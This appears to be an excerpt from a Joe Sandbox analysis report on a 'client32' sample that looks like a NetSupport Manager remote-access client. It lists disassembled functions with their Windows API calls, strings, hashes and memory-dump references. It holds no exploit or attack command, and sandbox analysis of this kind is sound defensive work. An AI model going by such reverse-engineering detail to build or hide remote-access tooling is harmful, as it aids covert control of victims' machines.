Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
String ID: >$NSA.LIC$NSM.LIC$ProtectedStorage
API String ID: 83693535-2077998243
Opcode ID: ea01079b3a69128c3d048728477477d9e1582347cd19e62e3a32b1c26c627205
Instruction ID: 04708251a91dad33445a4b2ec32a8250cc93e5b442ce4a54dc650d09efa8bb0a
Opcode Fuzzy Hash: ea01079b3a69128c3d048728477477d9e1582347cd19e62e3a32b1c26c627205
Instruction Fuzzy Hash: 0CB1D475E012259FD722CFA4CD80BE9B7B5EB49708F5041E9E919AB380DB70AE80CF51

Function 11030AC1 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 224sleepCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,33E68B52,00000000,00000000,00000000), ref: 11030B2A
EnumWindows.USER32(1102FB50,00000001), ref: 11030C02
EnumWindows.USER32(1102FB50,00000000), ref: 11030C5C
Sleep.KERNEL32(00000014,?,?,?,?,?,00000000), ref: 11030C6C

Strings

No new explorer wnd, xrefs: 11030C83
Client, xrefs: 11030B47
close new explorer wnd x%x, xrefs: 11030D3F
\Explorer.exe, xrefs: 11030B6A
*ExitMetroDelay, xrefs: 11030B42
"%sNSMExec.exe" %s, xrefs: 11030C15

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Windows$Enum$DirectorySleep
String ID: "%sNSMExec.exe" %s$*ExitMetroDelay$Client$No new explorer wnd$\Explorer.exe$close new explorer wnd x%x
API String ID: 513616096-1852639040
Opcode ID: 1598893193d057d75497eba34d115911eeff59241f6e154903c99c8da51039c9
Instruction ID: 1de763de9d71dac94d5a43d888d52470e3c4d0e72ae9e6cf16424bc1766d75f2
Opcode Fuzzy Hash: 1598893193d057d75497eba34d115911eeff59241f6e154903c99c8da51039c9
Instruction Fuzzy Hash: 0281D475E1121A8FDB18DF64CC84BEEF7E1AF88309F1441E9D94997244EB30AD41CB92

Function 11026E80 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 136threadwindowsleepCOMMON

Download Yara Rule

APIs

Part of subcall function 11088380: UnhookWindowsHookEx.USER32(?), ref: 110883A3

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 11026EC4

Part of subcall function 1110C4B0: _malloc.LIBCMT ref: 1110C4C9
Part of subcall function 1110C4B0: wsprintfA.USER32 ref: 1110C4E4
Part of subcall function 1110C4B0: _memset.LIBCMT ref: 1110C507

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000001F4), ref: 11026F33
PostMessageA.USER32(000203F4,00000501,00000000,00000000), ref: 11026F50
SetEvent.KERNEL32(00000288), ref: 11026F61
Sleep.KERNEL32(00000032), ref: 11026F69
PostMessageA.USER32(000203F4,00000800,00000000,00000000), ref: 11026F9E
GetCurrentThreadId.KERNEL32 ref: 11026FCA
GetThreadDesktop.USER32(00000000), ref: 11026FD1
SetThreadDesktop.USER32(00000000), ref: 11026FDA
CloseDesktop.USER32(00000000), ref: 11026FE5
CloseHandle.KERNEL32(000004A8), ref: 11027025

Part of subcall function 1110D180: GetCurrentThreadId.KERNEL32 ref: 1110D216
Part of subcall function 1110D180: InitializeCriticalSection.KERNEL32(-00000010,?,110309CC,00000001,00000000), ref: 1110D229
Part of subcall function 1110D180: InitializeCriticalSection.KERNEL32(111EB8A0,?,110309CC,00000001,00000000), ref: 1110D238
Part of subcall function 1110D180: EnterCriticalSection.KERNEL32(111EB8A0,?,110309CC), ref: 1110D24C
Part of subcall function 1110D180: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,110309CC), ref: 1110D272

Strings

Async, xrefs: 11026EA8

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Thread$CriticalDesktopEventSection$CloseCreateCurrentInitializeMessagePost$EnterHandleHookMultipleObjectsSleepUnhookWaitWindows_malloc_memsetwsprintf
String ID: Async
API String ID: 3276504616-2933828738
Opcode ID: 2c569aaafe7c4b94deb444771dd6f7ee4e9a7176056a8f3c162f4ff47e12eb10
Instruction ID: ca11adbbf16c7c0caa3a86322762a5ec1604f7f83b321ded2c6a28509906ef70
Opcode Fuzzy Hash: 2c569aaafe7c4b94deb444771dd6f7ee4e9a7176056a8f3c162f4ff47e12eb10
Instruction Fuzzy Hash: A3419F75A012229BEB02DFE4CD85F6ABBA4EB04718F504179FE2597284EB70A801CB52

Function 6C611D3F Relevance: 21.1, APIs: 14, Instructions: 108threadCOMMON

Download Yara Rule

APIs

__set_flsgetvalue.MSVCR100(6C611DE0,00000008,6C611E16,00000001,?), ref: 6C611D6A

Part of subcall function 6C610341: TlsGetValue.KERNEL32(?,6C610713), ref: 6C61034A

TlsGetValue.KERNEL32(6C611DE0,00000008,6C611E16,00000001,?), ref: 6C611D7B
_calloc_crt.MSVCR100(00000001,00000214), ref: 6C611D8E
DecodePointer.KERNEL32(00000000), ref: 6C611DAC
_initptd.MSVCR100(00000000,00000000), ref: 6C611DBE

Part of subcall function 6C611E9B: GetModuleHandleW.KERNEL32(KERNEL32.DLL,6C611F38,00000008,6C6375E9,00000000,00000000), ref: 6C611EAC
Part of subcall function 6C611E9B: _lock.MSVCR100(0000000D), ref: 6C611EE0
Part of subcall function 6C611E9B: InterlockedIncrement.KERNEL32(?), ref: 6C611EED
Part of subcall function 6C611E9B: _lock.MSVCR100(0000000C), ref: 6C611F01

GetCurrentThreadId.KERNEL32 ref: 6C611DC5
__freeptd.LIBCMT ref: 6C612971
__heap_init.LIBCMT ref: 6C61B8B1
GetCommandLineA.KERNEL32(6C611DE0,00000008,6C611E16,00000001,?), ref: 6C61B8E2
GetCommandLineW.KERNEL32 ref: 6C61B8ED
__ioterm.LIBCMT ref: 6C627B7E
free.MSVCR100(00000000), ref: 6C637485

Memory Dump Source

Source File: 00000004.00000002.4575938208.000000006C601000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000004.00000002.4575920772.000000006C600000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.4576103842.000000006C6B4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.4576121278.000000006C6B6000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.4576247728.000000006C6B9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c600000_client32.jbxd

Similarity

API ID: CommandLineValue_lock$CurrentDecodeHandleIncrementInterlockedModulePointerThread__freeptd__heap_init__ioterm__set_flsgetvalue_calloc_crt_initptdfree
String ID:
API String ID: 2121586863-0
Opcode ID: 28aa8c3570d936d46ba0123989e91931f55e129a05f71ca2d8a74452a3590a0c
Instruction ID: 83304f4ae0ae66b42ba12aefe0b9df789e187da2d991a869b3a38d3ca23dd3b8
Opcode Fuzzy Hash: 28aa8c3570d936d46ba0123989e91931f55e129a05f71ca2d8a74452a3590a0c
Instruction Fuzzy Hash: 3C31BC31A5A652EADF002FBF8A849DE36F0EF4331FB20151AE455C9E80DF25C0559E2E

Function 11030378 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 249COMMON

Download Yara Rule

APIs

Part of subcall function 1110C4B0: _malloc.LIBCMT ref: 1110C4C9
Part of subcall function 1110C4B0: wsprintfA.USER32 ref: 1110C4E4
Part of subcall function 1110C4B0: _memset.LIBCMT ref: 1110C507

GetStockObject.GDI32(0000000D), ref: 110305B2
GetObjectA.GDI32(00000000,0000003C,?), ref: 110305C2
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11030600
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11030606
InterlockedExchange.KERNEL32(023C8D48,00001388), ref: 11030686
GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110306B8
_sprintf.LIBCMT ref: 110306CD
_setlocale.LIBCMT ref: 110306D7

Strings

pcicl32, xrefs: 11030791
.%d, xrefs: 110306C2
Error %s unloading audiocap dll, xrefs: 110308CF

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorModeObject$ExchangeInterlockedStock_malloc_memset_setlocale_sprintfwsprintf
String ID: .%d$Error %s unloading audiocap dll$pcicl32
API String ID: 4242130455-3899566344
Opcode ID: cc707323f165bac2605da14c4cc76d5f621c5b5b6c430159a10b8f968689a59c
Instruction ID: 3a554666509fb53f2837099f2099817ba134c3f60a5fb41213f434d841167a34
Opcode Fuzzy Hash: cc707323f165bac2605da14c4cc76d5f621c5b5b6c430159a10b8f968689a59c
Instruction Fuzzy Hash: 0491F7B4E06355DEDB02CBF488847AEFEF0AB8430CF1041EAD455A7289FB755A44CB52

Function 11141440 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 175registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetVersionExA.KERNEL32(111EBE98,76938400), ref: 11141470
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 111414AF
_memset.LIBCMT ref: 111414CD

Part of subcall function 1113F3A0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110C55B,76938400,?,?,111414FF,00000000,CSDVersion,00000000,00000000,?), ref: 1113F3C0

_strncpy.LIBCMT ref: 1114159A

Part of subcall function 1116010D: __isdigit_l.LIBCMT ref: 11160132

RegCloseKey.KERNEL32(00000000), ref: 11141636

Strings

CSDVersion, xrefs: 111414EA
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 1114149B
Service Pack, xrefs: 1114167D
CurrentMinorVersionNumber, xrefs: 11141600
CurrentMajorVersionNumber, xrefs: 111415C8
CurrentVersion, xrefs: 11141514

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
API String ID: 3299820421-2117887902
Opcode ID: cc156d2fc60b229b2d92a42974f8c00efbb54fd9c1e8173fb7513e6fbbdd6634
Instruction ID: 0d1b9e8298f1eb51cd51357b4b29a3df9733e94562d2b2a18f885034f0aa44e4
Opcode Fuzzy Hash: cc156d2fc60b229b2d92a42974f8c00efbb54fd9c1e8173fb7513e6fbbdd6634
Instruction Fuzzy Hash: 3351EA71F0022A9FDB21DFA1CC41FEEF7B9AB41708F1440A9E51D66141E7B0BA44CBA5

Function 110267B0 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 174sleepCOMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 11026836
_strtok.LIBCMT ref: 11026870
Sleep.KERNEL32(1102F5F3,?,*max_sessions,0000000A,00000000,00000000,00000002), ref: 11026964

Strings

Error. not all transports loaded (%d/%d), xrefs: 11026938
LoadTransports(%d), xrefs: 110268AC
Client, xrefs: 11026826, 110268CB
UseNCS, xrefs: 1102688D
TCPIP, xrefs: 11026892
*max_sessions, xrefs: 110268C6
Retrying..., xrefs: 11026952
Protocols, xrefs: 11026821

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strtok$Sleep
String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
API String ID: 2009458258-3774545468
Opcode ID: 08a7d2993743d61d46cd9974078375083517d7aff46eb18fcceb88c22e0d8912
Instruction ID: d52657f79db0df0ce9085bbf6ec612411b4caf13fb54bf73663b3ccfc433d9d3
Opcode Fuzzy Hash: 08a7d2993743d61d46cd9974078375083517d7aff46eb18fcceb88c22e0d8912
Instruction Fuzzy Hash: 445126B5E0125A9BDB11CFE4CC80BEEFBE5EF80308F54416AEC1567244EB716946C792

Function 6C3C8D00 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 144COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,6C3D67B5), ref: 6C3C8D6B

Part of subcall function 6C3C4F70: LoadLibraryA.KERNEL32(psapi.dll,?,6C3C8DC8), ref: 6C3C4F78

GetCurrentProcessId.KERNEL32 ref: 6C3C8DCB
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 6C3C8DD8
FreeLibrary.KERNEL32(?), ref: 6C3C8EBF

Part of subcall function 6C3C4FB0: GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 6C3C4FC4
Part of subcall function 6C3C4FB0: K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,6C3C8E0D,00000000,?,6C3C8E0D,00000000,?,00000FA0,?), ref: 6C3C4FE4

CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 6C3C8EAE

Part of subcall function 6C3C5000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6C3C5014
Part of subcall function 6C3C5000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6C3C8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6C3C5034

Part of subcall function 6C3C2420: _strrchr.LIBCMT ref: 6C3C242E

Strings

NSM247Ctl.dll, xrefs: 6C3C8E7E
CLIENT247, xrefs: 6C3C8DA7
Set Is247=%d, xrefs: 6C3C8ED7
pcictl_247.dll, xrefs: 6C3C8E6C
NSM247, xrefs: 6C3C8D8B
is247, xrefs: 6C3C8D42

Memory Dump Source

Source File: 00000004.00000002.4575810367.000000006C3C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C3C0000, based on PE: true

Associated: 00000004.00000002.4575794801.000000006C3C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575856135.000000006C409000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575904976.000000006C410000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c3c0000_client32.jbxd

Yara matches

Similarity

API ID: Process$AddressFileLibraryModuleNameProc$CloseCurrentEnumFreeHandleLoadModulesOpen_strrchr
String ID: CLIENT247$NSM247$NSM247Ctl.dll$Set Is247=%d$is247$pcictl_247.dll
API String ID: 2714439535-3484705551
Opcode ID: be8a5f77177a359d0b59bd8b626097e47dff300d32ef47f0b6c69ee8d65be955
Instruction ID: 929111eb0a026269b6373e0965640cc53417b2210fe60a790e66a8b75beb14de
Opcode Fuzzy Hash: be8a5f77177a359d0b59bd8b626097e47dff300d32ef47f0b6c69ee8d65be955
Instruction Fuzzy Hash: 4441F971B402189BDB10EB61DD44FEE7778EB45709F00046AEA55A7A40EB719E48CF63

Function 110FFDC0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 68threadCOMMON

Download Yara Rule

APIs

Part of subcall function 11088380: UnhookWindowsHookEx.USER32(?), ref: 110883A3

GetCurrentThreadId.KERNEL32 ref: 110FFDDC
GetThreadDesktop.USER32(00000000), ref: 110FFDE3
OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 110FFDF3
SetThreadDesktop.USER32(00000000), ref: 110FFE00
CloseDesktop.USER32(00000000), ref: 110FFE19
GetLastError.KERNEL32 ref: 110FFE21
CloseDesktop.USER32(00000000), ref: 110FFE37
GetLastError.KERNEL32 ref: 110FFE3F

Strings

SetThreadDesktop(%s) ok, xrefs: 110FFE0B
SetThreadDesktop(%s) failed, e=%d, xrefs: 110FFE29
OpenDesktop(%s) failed, e=%d, xrefs: 110FFE47

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
API String ID: 2036220054-60805735
Opcode ID: 9ed234f7ecce24b995901de844769b8813121c75129d39a6b020755d9e67db27
Instruction ID: 6ff64ee9786642f480deaccef50bf387ca9b6f285afe7fc7d9ca5382326c2a2a
Opcode Fuzzy Hash: 9ed234f7ecce24b995901de844769b8813121c75129d39a6b020755d9e67db27
Instruction Fuzzy Hash: 3911737AF012136BE701AFB16C89BAFBA2C9F55A1EF154038F61695146EF34A40487F3

Function 1115AA90 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 57COMMON

Download Yara Rule

APIs

GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115AAB8
GetLastError.KERNEL32 ref: 1115AAC5
wsprintfA.USER32 ref: 1115AAD8

Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179

Part of subcall function 110290C0: _strrchr.LIBCMT ref: 110291B5
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 110291F4

GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115AB1C
GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115AB29

Strings

NSMWndClass, xrefs: 1115AAB0
GlobalAddAtom failed, e=%d, xrefs: 1115AAD2
..\ctl32\wndclass.cpp, xrefs: 1115AAE9, 1115AB05
NSMReflect, xrefs: 1115AB17
m_aProp, xrefs: 1115AB0A
NSMDropTarget, xrefs: 1115AB1E

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
